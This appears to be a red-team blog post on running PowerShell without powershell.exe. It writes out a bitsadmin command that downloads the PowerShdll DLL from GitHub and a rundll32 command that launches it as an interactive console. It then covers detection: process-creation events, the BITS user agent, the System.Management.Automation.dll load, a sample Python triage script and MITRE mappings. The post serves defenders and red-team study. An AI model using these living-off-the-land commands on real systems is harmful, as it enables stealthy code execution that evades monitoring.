Hiding In Plain Sight
Posted on 2020-02-24 by Samuel Kimmons
During a recent test, one of the goals was to utilize PowerShell without executing the powershell.exe binary. So, naturally, I dove into researching PowerShell without PowerShell. After doing quite a bit of research, I decided to go with PowerShdll.
This DLL was created by p3nt4 and allows you to execute PowerShell Scripts, commands, encoded commands, and even an interactive shell. Ok, so I could download this on a box and execute it, and boom, now I have PowerShell without PowerShell. I began to think, why not take it a step further. If you’re thinking about it from an adversary’s perspective, and for this particular scenario, we want to execute some PowerShell scripts or commands without triggering any detections.
By taking it a step further, I wanted to start with the classic command prompt. Now I could have immediately gone with another toolset, but I’m a big fan of Living Off the Land Techniques. With access to the command prompt, I need to figure out a way to get the PowerShdll onto the system. Fortunately, Microsoft Windows includes plenty of binaries that incorporate some form of download functionality.
These built-in binaries are commonly referred to as LoLBins or Living Off the Land Binaries. For the download functionality, I chose the BITSADMIN LoLBin. According to Microsoft, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.” The “download or upload jobs” is exactly what we’re looking for. Now that we have our shell (CMD prompt) and our LoLBin (BITSADMIN), it’s time to download the DLL needed for this test.
bitsadmin /transfer test /priority high https://github.com/p3nt4/PowerShdll/blob/master/dll/bin/x64/Release/PowerShdll.dll?raw=true C:\Users\User\Downloads\test.dll
The command above specifies that we want to use bitsadmin, with a job title of “test”, to download the PowerShdll.dll from the GitHub repository and create a file called test.dll on the local system.
The bitsadmin LoLBin is even nice enough to show the progress of the download.
Now that we have the target dll downloaded, we need a way to invoke it.
Rundll32 has the ability to load and run 32-bit DLLs. Based on the available options for PowerShdll, we want to start an interactive console. According to the options listed on the PowerShdll repo, we can utilize -w (interactive console in new window) or -i (interactive console within the current console).
Here is the command that we’re going to use:
Rundll32 test.dll,main -w
The “main” portion of the command specifies the entry point that we’ll be using within the DLL.
After the command executes successfully, a new window opens up with an interactive PowerShell console...without invoking the actual PowerShell.exe binary.
When viewing the process tree in Process Hacker, this is what you'll see:
We’ve achieved our objectives of using a LoLBin for download capability and another for executing PowerShell without the PowerShell binary.
Now to turn the table around and look at it from a defensive perspective.
The first question: “How can we detect this?”
1. In order to detect this at the earliest part of the execution chain, we should start with the BITSAdmin process.
- Your endpoint protection triggers on the BITSAdmin LoLBin.
- Event ID 4688 (A New Process Has Been Created). This assumes that your host logs are being forwarded to some sort of security monitoring system.
- If you employ a network monitoring capability, you should notice a BITS user agent string.
2. If you're attempting to detect the use of PowerShell without the PowerShell binary:
- One method would be to look for the invocation of the System.Management.Automation.dll.
  - Most EDR solutions should be able to provide a detection capability for this.
- If you're looking at the host locally, you can view the threads and DLLs invoked by rundll32, or any other process.
In this example, I've searched for the System.Management.Automation.dll.
For comparison, here's what it will look like once the process has exited:
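The three detection points listed above (BITSAdmin process creation, the BITS user agent, and System.Management.Automation.dll loaded by a process that is not a PowerShell host) can be expressed as one small triage routine. This is an added example, not code from the original post or from the PowerShdll project. The normalized event fields, the host allowlist, the use of an image-load feed such as Sysmon Event ID 7, and the example.test URL are all assumptions, and the sample events are constructed.

```python
import re

# Hosts expected to load the PowerShell engine (assumed allowlist; tune per environment).
PS_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
# BITSAdmin switches that move files.
BITS_VERBS = re.compile(r"/(transfer|addfile)\b", re.I)
URL = re.compile(r"https?://\S+", re.I)

SAMPLE_EVENTS = [  # constructed events modelled on the commands in this post
    {"type": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer test /priority high https://example.test/payload.dll C:\Users\User\Downloads\test.dll"},
    {"type": "proxy", "user_agent": "Microsoft BITS/7.8", "url": "https://example.test/payload.dll"},
    {"type": "image_load", "image": r"C:\Windows\System32\rundll32.exe",
     "loaded": r"C:\Windows\assembly\NativeImages\System.Management.Automation.ni.dll"},
    {"type": "image_load", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "loaded": r"C:\Windows\Microsoft.NET\assembly\System.Management.Automation.dll"},
]

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()

def detect(event):
    """Return (signal, detail) findings for one normalized event dict."""
    findings = []
    kind = event.get("type")
    if kind == "process_create":  # Security 4688 with command-line auditing enabled
        image, cmd = basename(event["image"]), event.get("cmdline", "")
        if image == "bitsadmin.exe" and BITS_VERBS.search(cmd):
            url = URL.search(cmd)
            findings.append(("bitsadmin_transfer", url.group(0) if url else "no URL"))
    elif kind == "proxy":  # web proxy or network sensor record
        if event.get("user_agent", "").lower().startswith("microsoft bits/"):
            findings.append(("bits_user_agent", event["url"]))
    elif kind == "image_load":  # e.g. Sysmon Event ID 7 (assumed telemetry source)
        module, host = basename(event["loaded"]), basename(event["image"])
        # Substring match also covers the native-image copy (…Automation.ni.dll).
        if "system.management.automation" in module and host not in PS_HOSTS:
            findings.append(("ps_engine_in_unexpected_host", f"{host} loaded {module}"))
    return findings

def scan(events):
    return [finding for event in events for finding in detect(event)]

if __name__ == "__main__":
    for signal, detail in scan(SAMPLE_EVENTS):
        print(f"{signal}: {detail}")
```

The 4688 branch only works if command-line auditing is enabled for process creation events; without it the event carries the image name but not the `/transfer` arguments.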
What categories on the MITRE table should we be concerned with?
- There are several, but to keep it simple, we should focus on the two listed below.

| ID | Technique | Description |
|---|---|---|
| T1105 | Remote File Copy | BITSAdmin can be used to create BITS Jobs to upload and/or download files |
| T1085 | Rundll32 | Can be called to execute an arbitrary binary |
So, after experimenting with PowerShell without PowerShell, we can see that it's pretty effective. Another thing to note is that if you're not properly monitoring LoLBins for malicious activity, you could be missing quite a bit. While these types of techniques are widely used, there are ways to detect and possibly restrict the use of LoLBins.
Samuel Kimmons is a Lead Cyber Threat Emulator/Red Teamer and Penetration Tester at the United States-Air Force Computer Emergency Response Team (US-AFCERT). He has several years of experience which include: red teaming, endpoint security, vulnerability management, penetration testing, and system administration. Samuel is responsible for conducting red team engagements, full scope penetration tests, researching and utilizing adversary Tactics, Techniques, and Procedures. In addition to his work experience and training, Samuel holds GCIH, GWAPT, GPEN, GXPN, GCFA, and is currently pursuing: OSCP. He also enjoys giving back to the security community by creating Cyber Security and Hacking blogs and videos.